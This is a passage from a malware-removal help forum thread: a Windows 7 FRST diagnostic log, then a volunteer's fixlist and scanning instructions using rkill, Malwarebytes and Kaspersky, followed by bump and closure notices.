Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
 
==================== Restore Points  =========================
 
13-09-2014 00:04:06 Windows 7 Service Pack 1
13-09-2014 00:24:09 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 10:04 - 2014-09-13 00:30 - 00000027 ____A C:\windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0600C6CD-339E-40E5-837D-772661A93D2E} - System32\Tasks\{47BE60EA-15BF-417B-8455-8082DD3AA6C9} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0B0DCD61-E65B-41BD-87A5-E3FF4E52896D} - System32\Tasks\{2E3D8B46-8C0C-4CE5-BD72-9EA8BF2819A4} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0E809153-173D-4501-9AA3-E3299B8E4EEB} - System32\Tasks\{6446B742-20A7-4A87-91FB-1DAF36B20FDE} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {131204F4-96CD-4DA3-BE7A-816280B2F3AB} - System32\Tasks\{88F08FA9-BE71-4A64-979B-251F068C947A} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {3655B183-5D27-422D-9FD5-CB1638615759} - System32\Tasks\{35038549-A0E9-41DD-B0FC-39A9B0A1194D} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {48A8BE75-28FC-45FC-A2E4-BFBF99AB848F} - System32\Tasks\{E274B4A1-AFB4-49EA-BF80-7ACE438DC09F} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {67B5FCE5-D76F-44AC-A382-B1B5E874D085} - System32\Tasks\{3B5FF27F-F004-4707-A208-EAF4518D4AC7} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {69ACD1BB-0C0D-4370-BBB9-8E8D07A61169} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {77F07B0E-D155-4273-A665-FD20F9C0B9B7} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2010-02-23] (TOSHIBA CORPORATION)
Task: {81532BAB-54D1-4201-941B-AF6D56C850A4} - System32\Tasks\{F810B7E8-5B48-4A60-BF3B-7EED4E944DA3} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {8987DC76-A8B3-49B2-A0BB-072667F6A7AE} - System32\Tasks\{0443CAD0-DB77-4C07-86A1-3FE551E42396} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
Task: {9ECA6E1B-A776-4C9B-B04A-A87D8E24AFAB} - System32\Tasks\{DC76CA08-A16E-427C-ABBC-3E5C759C3EA6} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {A264B53A-C76E-4EF8-A314-785501361D1E} - System32\Tasks\{9D54E60D-393D-4FD2-96B6-96A73B3AF2D9} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {B714418F-4FFB-4571-BE0E-0838A402499C} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27] (Adobe Systems Incorporated)
Task: {CE67E4A0-0B09-4CF4-8D12-2080226E2384} - System32\Tasks\{928F0CFC-9063-46E2-BD07-C6585B0230DC} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {E331DF70-0764-4282-9BBA-EEB4DE041C73} - System32\Tasks\{F687F45B-D1DB-4FA4-BD38-ED30604C0A48} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2006-12-04 01:25 - 2006-12-04 01:25 - 00022723 _____ () C:\windows\System32\sugs2l3.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 08783160 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-04 04:26 - 2009-11-04 04:26 - 00058680 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2009-03-13 10:08 - 2009-03-13 10:08 - 00049152 _____ () C:\Program Files\Toshiba\PCDiag\NotifyPCD.dll
2009-07-26 02:07 - 2009-07-26 02:07 - 00058704 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2010-11-17 13:16 - 2010-11-17 13:16 - 00067872 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2009-10-14 01:00 - 2009-10-14 01:00 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-11-03 08:46 - 2010-11-03 08:46 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-01-11 18:27 - 2013-01-11 18:27 - 00172544 _____ () C:\windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\72d7ad1c7236c618e32950b49869a26b\IsdiInterop.ni.dll
2011-12-01 10:49 - 2011-10-17 15:08 - 00059904 _____ () C:\Program Files\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x16b4
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: regsvr32.exe, version: 6.1.7600.16385, time stamp: 0x4a5bca28
Faulting module name: ntdll.dll, version: 6.1.7600.16915, time stamp: 0x4ec49caf
Exception code: 0xc0000029
Fault offset: 0x0008df89
Faulting process id: 0x1688
Faulting application start time: 0xregsvr32.exe0
Faulting application path: regsvr32.exe1
Faulting module path: regsvr32.exe2
Report Id: regsvr32.exe3
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Explorer.EXE, version: 6.1.7600.16768, time stamp: 0x4d6878c3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0xffb4e0b3
Faulting process id: 0x8d0
Faulting application start time: 0xExplorer.EXE0
Faulting application path: Explorer.EXE1
Faulting module path: Explorer.EXE2
Report Id: Explorer.EXE3
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc6
Faulting process id: 0x594
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x15cc
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x176c
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
 
System errors:
=============
Error: (09/13/2014 08:47:43 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 08:45:50 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 08:42:36 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 08:28:33 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x8024200d: Windows 7 Service Pack 1 (KB976932).
 
Error: (09/13/2014 08:16:40 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/13/2014 08:07:50 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x8024200d: Windows 7 Service Pack 1 (KB976932).
 
Error: (09/13/2014 07:49:56 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Microsoft Office PowerPoint 2007 (KB2596764).
 
Error: (09/13/2014 00:30:43 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 00:21:20 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 00:14:46 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
 
Microsoft Office Sessions:
=========================
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/13/2014 07:49:49 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc916b401cfce2a5e91c3e8C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllfb2c76e5-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: regsvr32.exe6.1.7600.163854a5bca28ntdll.dll6.1.7600.169154ec49cafc00000290008df89168801cfce2b501bf5d6C:\windows\system32\regsvr32.exeC:\windows\SYSTEM32\ntdll.dll949944e1-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Explorer.EXE6.1.7600.167684d6878c3unknown0.0.0.000000000c0000005ffb4e0b38d001cfce1e5f8c4d59C:\windows\Explorer.EXEunknown8fe7ca2a-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc659401cfce25c25dfa46C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll7c87949c-3a1d-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc915cc01cfce1ec62e079cC:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllf70bd7ca-3a18-11e4-8580-4cedde1b1e7f
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9176c01cfcdadc8bc3834C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll04b32946-39a3-11e4-aa00-00266c867412
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-21 08:59:48.259
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.229
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.179
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.139
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.049
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.999
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.959
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Percentage of memory in use: 42%
Total physical RAM: 3061.86 MB
Available physical RAM: 1759.14 MB
Total Pagefile: 6122 MB
Available Pagefile: 4757.23 MB
Total Virtual: 2047.88 MB
Available Virtual: 1887.62 MB
 
==================== Drives ================================
 
Drive c: (S3A8572D009) (Fixed) (Total:583.02 GB) (Free:546.43 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: () (Removable) (Total:7.45 GB) (Free:4.98 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: 9BD1B9BA)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=583 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=17)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#11 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 13 September 2014 - 03:53 PM

Hi tantryl,

 

Perform the following procedure.

 

Step 1:

 

Run FRST fixlist

 

Please open notepad (Start > All Programs > Accessories > Notepad)
Copy the entire contents of the code box below (Do not copy the word 'code') to Notepad.
Save it to the Desktop, and name it: fixlist.txt

Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty

NOTICE: This script is written specifically for this computer!!!
Running this on another computer may cause damage to the Operating System.

Now, please run FRST, and press the Fix button, just once, and wait.

When done, the tool creates a report on the Desktop called: Fixlog.txt

>> Please post the Fixlog.txt in your reply.

 

Step 2:

 

Please try running rkill and MalwareBytes again in safe mode.

Safe Mode with Networking :

  • Restart your computer.
  • After hearing your computer beep once during startup, but before the Windows icon appears, start pressing the F8 key.
  • In some systems, this may be the F5 key.
  • Instead of Windows loading as normal, a menu should appear.
  • Use the up arrow key to highlight Safe Mode with Networking and press 'Enter'.
  • Log in to your usual account.

 

Step 3:

 

Please download the Kaspersky Virus Removal Tool from here to your Desktop.

Double-click the Removal Tool.
Click the cog in the upper right corner:

Select down to and including your main drive.
Once done please select the Automatic Scan tab and press Start Scan.

Allow AVP to delete all infections found.
Once it has finished select the Report tab.
Select the Detected threats report from the left and press the Save button.
Save it to your Desktop and post the contents in your next reply.

 

-----------------

 

How are the browsers and the system now?

 

 

Best regards.

 

 

 


Best regards
 
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#12 olgun52


Posted 15 September 2014 - 06:24 AM

48 Hour bump

It has been more than 48 hours since my last post.

  • Do you still need help with this?
  • Do you need more time?
  • Are you having problems following my instructions?
  • If after 48hrs you have not replied to this thread then it will have to be closed!


 


 


#13 olgun52


Posted 18 September 2014 - 06:34 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.


 


 




